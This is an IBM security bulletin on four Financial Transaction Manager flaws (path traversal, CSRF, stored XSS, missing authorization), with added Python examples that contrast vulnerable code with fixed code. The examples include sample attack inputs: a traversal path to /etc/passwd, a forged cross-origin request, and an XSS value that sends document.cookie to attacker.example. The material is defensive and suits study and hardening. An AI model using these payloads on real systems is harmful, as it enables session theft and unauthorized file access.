
Security Bulletin: IBM Financial Transaction Manager 2.0 and 2.1 OAC vulnerabilities (CVE-2014-0830, CVE-2014-0831, CVE-2014-0832, CVE-2014-0833)

Security Bulletin


Summary

IBM Financial Transaction Manager 2.0 and 2.1 OAC vulnerabilities

Vulnerability Details

CVE ID: CVE-2014-0830

SUMMARY: FTM 2.0 and 2.1 table export function exposes a path traversal vulnerability

DESCRIPTION:
Search results in the FTM console can be exported as CSV text files. As part of this function, the server-side code serves temporary files from the WAS server. Once logged in, a rogue user can use client-side tools to alter the name of the file to be read, including inserting path traversal sequences that point outside the temporary file location. This potentially allows download of unauthorized files from the file system hosting the application server.
This exposure is limited to authenticated users.
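The following is an added illustration of the flaw class described above and of the containment check that fixes it; it is not FTM code, and the export directory name, the file-name allowlist and the sample names are assumptions. It also shows why a plain string-prefix test is not a sufficient fix (a sibling directory sharing the prefix passes it), which goes beyond what the description states.

```python
import posixpath
import re

# Assumed export location: the bulletin does not name FTM's real temp-file directory.
EXPORT_DIR = "/srv/ftm/export-tmp"

# Export files are generated by the server, so their names can be allowlisted tightly.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.csv")


class PathTraversalError(ValueError):
    """Raised when a requested export name would be read from outside EXPORT_DIR."""


def vulnerable_export_path(requested: str) -> str:
    """Reconstruction of the flawed pattern described in the bulletin: the
    client-controlled name is joined onto the temp directory and opened with no
    containment check. normpath shows which file the OS would actually open."""
    return posixpath.normpath(posixpath.join(EXPORT_DIR, requested))


def contained_export_path(requested: str) -> str:
    """Canonicalise the joined path and require EXPORT_DIR to be a strict
    ancestor of the result. commonpath is used instead of str.startswith so a
    sibling directory such as /srv/ftm/export-tmp-other is rejected as well.
    posixpath keeps the example deterministic offline; a real handler should
    additionally call os.path.realpath on the opened file to defeat symlinks."""
    if "\x00" in requested:
        raise PathTraversalError("NUL byte in file name")
    candidate = posixpath.normpath(posixpath.join(EXPORT_DIR, requested))
    if candidate == EXPORT_DIR or posixpath.commonpath([EXPORT_DIR, candidate]) != EXPORT_DIR:
        raise PathTraversalError(f"{requested!r} resolves outside {EXPORT_DIR}")
    return candidate


def export_path(requested: str) -> str:
    """Defence in depth: allowlist the bare name first, then apply the
    containment check. Anything the server would not have generated itself is
    treated as a tampered request."""
    if not SAFE_NAME.fullmatch(requested):
        raise PathTraversalError(f"{requested!r} is not a valid export file name")
    return contained_export_path(requested)


def is_contained(requested: str) -> bool:
    """Accept/reject view of the containment check alone."""
    try:
        contained_export_path(requested)
    except PathTraversalError:
        return False
    return True


def is_safe_export(requested: str) -> bool:
    """Accept/reject view of the full check (allowlist plus containment)."""
    try:
        export_path(requested)
    except PathTraversalError:
        return False
    return True


if __name__ == "__main__":
    for name in ("report-20140124.csv", "../../../etc/passwd", "/etc/passwd",
                 "../export-tmp-other/x.csv"):
        print(f"{name!r:32} vulnerable -> {vulnerable_export_path(name):40} "
              f"contained? {is_contained(name)}  accepted? {is_safe_export(name)}")
```

The mitigation below (limiting what the application server account can read) bounds the damage when such a check is missing; the check itself is what closes the hole.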

CVSS Base Score: 4.0
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/90584 for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:N/AC:L/Au:S/C:P/I:N/A:N)


AFFECTED PRODUCTS:
IBM Financial Transaction Manager: 2.0 & 2.1

REMEDIATION:
FTM 2.0 customers may apply PTF/fixpack 2.0.0.3 or upgrade to FTM 2.1.1
FTM 2.1 customers may apply PTF/fixpack 2.1.0.1 or upgrade to FTM 2.1.1


WORKAROUND(s):
None


MITIGATION(s):
Ensure the application server user account does not have privileges to read files outside of its directories.


CVE ID: CVE-2014-0831

SUMMARY: FTM 2.0 OAC is not protected from cross-site request forgery (CSRF) vulnerabilities.

DESCRIPTION:
A hand-crafted link could be used to trick a logged-in user into initiating a function of the FTM OAC. If the user is authorized, the request could edit configuration data. Detailed knowledge of the FTM HTTP request format is required to exploit this, and a request that edits configuration data would additionally need knowledge of the data being edited. Any such edit would be audited and recorded in the edit history.
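The following is an added example of the defence for the issue described above (a state-changing handler that rejects requests not originating from its own pages); it is not FTM code. The site origin, the configuration keys and the request shapes are constructed for illustration. It shows the three forged shapes a practitioner would test: the hand-crafted GET link from the description, a cross-origin auto-submitting form, and a same-method request with no token.

```python
import hmac
import secrets
from dataclasses import dataclass, field

# Assumed origin of the FTM OAC; not stated in the bulletin.
SITE_ORIGIN = "https://ftm-oac.example.internal"

# Constructed stand-in for FTM configuration data and its edit history.
CONFIG = {"retry_limit": "3", "cutoff_time": "17:00"}
EDIT_HISTORY = []


@dataclass
class Session:
    """Server-side state for a logged-in OAC user. The anti-CSRF token is minted
    once per session and only embedded in pages served from SITE_ORIGIN, so a
    page on another origin cannot read it (the browser only adds the cookie)."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


def edit_config(session: Session, method: str, headers: dict, form: dict):
    """Hardened configuration-edit handler. Returns (accepted, reason)."""
    # 1. A hand-crafted link is a GET. State changes must only be reachable by POST.
    if method != "POST":
        return False, "state change requires POST"
    # 2. If the browser sent an Origin header, it must name our own site.
    origin = headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return False, f"cross-origin request from {origin}"
    # 3. Synchronizer token: constant-time compare against the session's value.
    supplied = str(form.get("csrf_token", ""))
    if not hmac.compare_digest(supplied.encode(), session.csrf_token.encode()):
        return False, "missing or invalid CSRF token"
    key, value = form.get("key"), form.get("value")
    if key not in CONFIG:
        return False, f"unknown configuration key {key!r}"
    CONFIG[key] = value
    EDIT_HISTORY.append((session.user, key, value))  # the audit trail the bulletin mentions
    return True, "updated"


def forged_link_request(session: Session):
    """What the hand-crafted link from the bulletin produces: a GET carrying the
    edit parameters. The attacker knows the request format but not the token."""
    return edit_config(session, "GET", {}, {"key": "retry_limit", "value": "0"})


def forged_form_request(session: Session):
    """What a hidden auto-submitting form on an attacker's page produces: a POST
    sent with the victim's cookies, a foreign Origin and a guessed token."""
    return edit_config(session, "POST", {"Origin": "https://attacker.example"},
                       {"key": "retry_limit", "value": "0", "csrf_token": "guess"})


def legitimate_request(session: Session, value: str):
    """The OAC's own form: same origin, POST, token copied from the served page."""
    return edit_config(session, "POST", {"Origin": SITE_ORIGIN},
                       {"key": "retry_limit", "value": value, "csrf_token": session.csrf_token})


if __name__ == "__main__":
    s = Session("operator1")
    print("legitimate:", legitimate_request(s, "5"))
    print("forged link:", forged_link_request(s))
    print("forged form:", forged_form_request(s))
    print("config now:", CONFIG, "history:", EDIT_HISTORY)
```

The Origin check alone is not enough (older browsers omit the header on some requests), and the token alone does not stop a GET link from reaching a handler that changes state; the three checks together are what make the forged shapes fail.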

CVSS Base Score: 3.5
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/90585 for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:N/AC:M/Au:S/C:N/I:P/A:N)


AFFECTED PRODUCTS:
IBM Financial Transaction Manager: 2.0

REMEDIATION:
FTM 2.0 customers may apply PTF/fixpack 2.0.0.3 or upgrade to FTM 2.1.1


WORKAROUND(s):
None


MITIGATION(s):
None


CVE ID: CVE-2014-0832

SUMMARY: FTM 2.0 Configuration details screens are exposed to cross-site scripting (XSS) vulnerabilities.

DESCRIPTION:
It is possible to create and edit configuration data whose text values include JavaScript. A subsequent user viewing these records would inadvertently execute that JavaScript in their browser (a stored cross-site scripting condition).
This exposure is limited to authenticated users.
The creation and/or edit of data to contain potentially malicious JavaScript is fully audited and traceable back to the user.
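The following is an added example of the rendering defect described above and of the output-encoding fix, together with a sweep over stored records that uses the audit field to attribute suspicious values; it is not FTM code. The record layout, field names, editor names and the malicious values are constructed. The sweep generalises the point: an attribute-context payload that never contains `<script>` is also caught.

```python
import html
import re

# Constructed configuration records. cfg-0002 and cfg-0003 hold values a
# malicious authenticated user might have saved; last_editor is the audit trail.
RECORDS = [
    {"id": "cfg-0001", "name": "Partner bank feed",
     "description": "Inbound ISO 20022 batch", "last_editor": "operator3"},
    {"id": "cfg-0002", "name": "Clearing house B",
     "description": "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>",
     "last_editor": "operator7"},
    {"id": "cfg-0003", "name": "Archive",
     "description": 'x" onmouseover="alert(1)', "last_editor": "operator7"},
]


def render_row_vulnerable(record) -> str:
    """Pattern the bulletin describes: stored text is dropped straight into the
    page, so the saved script runs in every subsequent viewer's browser. The
    title attribute shows that a quote-breaking value escapes the attribute too."""
    return (f"<tr><td>{record['name']}</td>"
            f"<td title=\"{record['description']}\">{record['description']}</td></tr>")


def render_row(record) -> str:
    """Output encoding at render time. quote=True also encodes ' and \" so the
    same escaped value is safe in a double-quoted attribute as well as in
    element text. Encoding on output rather than on input means records that
    were saved before the fix are rendered safely as well."""
    def esc(value) -> str:
        return html.escape(str(value), quote=True)
    return (f"<tr><td>{esc(record['name'])}</td>"
            f"<td title=\"{esc(record['description'])}\">{esc(record['description'])}</td></tr>")


# Markers of active content inside values that are supposed to be plain text.
ACTIVE_MARKUP = re.compile(r"<\s*script|javascript:|on\w+\s*=", re.IGNORECASE)


def find_stored_markup(records):
    """Incident-response sweep: which configuration records already contain
    script-like content, in which field, and who last edited them. This is the
    practical use of the bulletin's note that edits are audited and traceable."""
    hits = []
    for rec in records:
        for fld in ("name", "description"):
            if ACTIVE_MARKUP.search(str(rec[fld])):
                hits.append((rec["id"], fld, rec["last_editor"]))
                break
    return hits


if __name__ == "__main__":
    for rec in RECORDS:
        print("UNSAFE:", render_row_vulnerable(rec))
        print("SAFE:  ", render_row(rec))
    print("records with stored markup:", find_stored_markup(RECORDS))
```

A pre-fix deployment can run the sweep against its configuration tables to find values that need review and the accounts that wrote them, which is the "restrict access to these screens" mitigation turned into a detection.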

CVSS Base Score: 3.5
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/90586 for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:N/AC:M/Au:S/C:N/I:P/A:N)


AFFECTED PRODUCTS:
IBM Financial Transaction Manager: 2.0

REMEDIATION:
FTM 2.0 customers may apply PTF/fixpack 2.0.0.3 or upgrade to FTM 2.1.1


WORKAROUND(s):
None


MITIGATION(s):
Restrict access to these screens to the minimum group of personnel to minimize risk.


CVE ID: CVE-2014-0833

SUMMARY: FTM 2.0 OAC could accept a request to execute a resolution action for which the user is not authorized.

DESCRIPTION:
It is possible for an authenticated user to initiate process steps they are not authorized to perform, on data that is in a state that supports operator intervention. The impact depends on the customer's process model and the action requested.
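The following is an added example of the server-side authorization check that closes the issue described above; it is not FTM code, and the roles, resolution actions, record states and transitions are a constructed model, since the bulletin does not describe FTM's real permission model. The point it demonstrates is that both dimensions named in the description (who the user is, and what state the data is in) must be enforced on the server, deny-by-default, regardless of what the browser offered.

```python
from dataclasses import dataclass

# Constructed permission model: which resolution actions each role may request.
ROLE_ACTIONS = {
    "viewer": frozenset(),
    "operator": frozenset({"retry", "hold"}),
    "supervisor": frozenset({"retry", "hold", "cancel", "force_complete"}),
}
# Constructed state model: which actions are meaningful for a record in each
# state. States with an empty set do not support operator intervention.
STATE_ACTIONS = {
    "FAILED": frozenset({"retry", "cancel"}),
    "SUSPENDED": frozenset({"retry", "hold", "cancel", "force_complete"}),
    "PENDING": frozenset({"hold"}),
    "COMPLETED": frozenset(),
}
TRANSITIONS = {"retry": "PENDING", "hold": "SUSPENDED",
               "cancel": "CANCELLED", "force_complete": "COMPLETED"}

AUDIT = []  # (user, record, action, outcome); denials are logged as well as successes


class AuthorizationError(PermissionError):
    """Raised when a user requests an action they may not perform."""


@dataclass
class User:
    name: str
    role: str


@dataclass
class Record:
    id: str
    state: str


def execute_resolution_vulnerable(user: User, record: Record, action: str) -> str:
    """Pattern implied by the bulletin: the server assumes the UI only offered
    buttons the user may press, so any action named in a crafted request runs."""
    record.state = TRANSITIONS[action]
    return record.state


def execute_resolution(user: User, record: Record, action: str) -> str:
    """Authorise on the server, deny by default, and audit every decision. The
    user's role AND the record's current state must both permit the action;
    checking only one leaves the other open to a hand-crafted request."""
    if action not in TRANSITIONS:
        AUDIT.append((user.name, record.id, action, "DENIED unknown action"))
        raise AuthorizationError(f"unknown action {action!r}")
    if action not in ROLE_ACTIONS.get(user.role, frozenset()):
        AUDIT.append((user.name, record.id, action, "DENIED role"))
        raise AuthorizationError(f"role {user.role} may not {action}")
    if action not in STATE_ACTIONS.get(record.state, frozenset()):
        AUDIT.append((user.name, record.id, action, "DENIED state"))
        raise AuthorizationError(f"{action} is not valid in state {record.state}")
    record.state = TRANSITIONS[action]
    AUDIT.append((user.name, record.id, action, "OK"))
    return record.state


def try_resolution(user: User, record: Record, action: str) -> bool:
    """Accept/reject wrapper; the record is left untouched on rejection."""
    try:
        execute_resolution(user, record, action)
    except AuthorizationError:
        return False
    return True


if __name__ == "__main__":
    viewer, operator = User("v1", "viewer"), User("o1", "operator")
    rec = Record("txn-1", "FAILED")
    print("vulnerable, viewer cancels:", execute_resolution_vulnerable(viewer, Record("txn-0", "FAILED"), "cancel"))
    print("hardened, viewer retries:", try_resolution(viewer, rec, "retry"), rec.state)
    print("hardened, operator retries:", try_resolution(operator, rec, "retry"), rec.state)
    print(AUDIT)
```

The logged denials are what an operations team would alert on: a user repeatedly submitting actions their role never shows in the UI is a deliberate attempt, not an accident.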

CVSS Base Score: 3.5
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/90612 for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:N/AC:M/Au:S/C:N/I:P/A:N)



AFFECTED PRODUCTS:
IBM Financial Transaction Manager: 2.0

REMEDIATION:
FTM 2.0 customers may apply PTF/fixpack 2.0.0.3 or upgrade to FTM 2.1.1


WORKAROUND(s):
None


MITIGATION(s):
Use of IE8 or Firefox instead of IE6 or IE7 will prevent accidental exposure but does not prevent deliberate exploitation.

RELATED INFORMATION:

https://www-304.ibm.com/jct03001c/security/secure-engineering/process.html

ACKNOWLEDGEMENT:

None

Affected Products and Versions

IBM Financial Transaction Manager v2.0 and v2.1

Remediation/Fixes

CVE ID          Product   VRMF                             APAR   Remediation
CVE-2014-0830   FTM       v2.0.0.0, v2.0.0.1, v2.0.0.2     None   Upgrade to v2.0.0.3 or v2.1.1
CVE-2014-0830   FTM       v2.1.0.0                         None   Upgrade to v2.1.0.1 or v2.1.1
CVE-2014-0831   FTM       v2.0.0.0, v2.0.0.1, v2.0.0.2     None   Upgrade to v2.0.0.3 or v2.1.1
CVE-2014-0832   FTM       v2.0.0.0, v2.0.0.1, v2.0.0.2     None   Upgrade to v2.0.0.3 or v2.1.1
CVE-2014-0833   FTM       v2.0.0.0, v2.0.0.1, v2.0.0.2     None   Upgrade to v2.0.0.3 or v2.1.1

Get Notified about Future Security Bulletins

Important Note

IBM strongly suggests that all System z customers be subscribed to the System z Security Portal to receive the latest critical System z security and integrity service. If you are not subscribed, see the instructions on the System z Security web site. Security and integrity APARs and associated fixes will be posted to this portal. IBM suggests reviewing the CVSS scores and applying all security or integrity fixes as soon as possible to minimize any potential risk.

References

Change History

24th January 2014: Original copy published

*The CVSS Environmental Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

Disclaimer

Review the IBM security bulletin disclaimer and definitions regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.


Document Information

Modified date: 16 June 2018
UID: swg21662714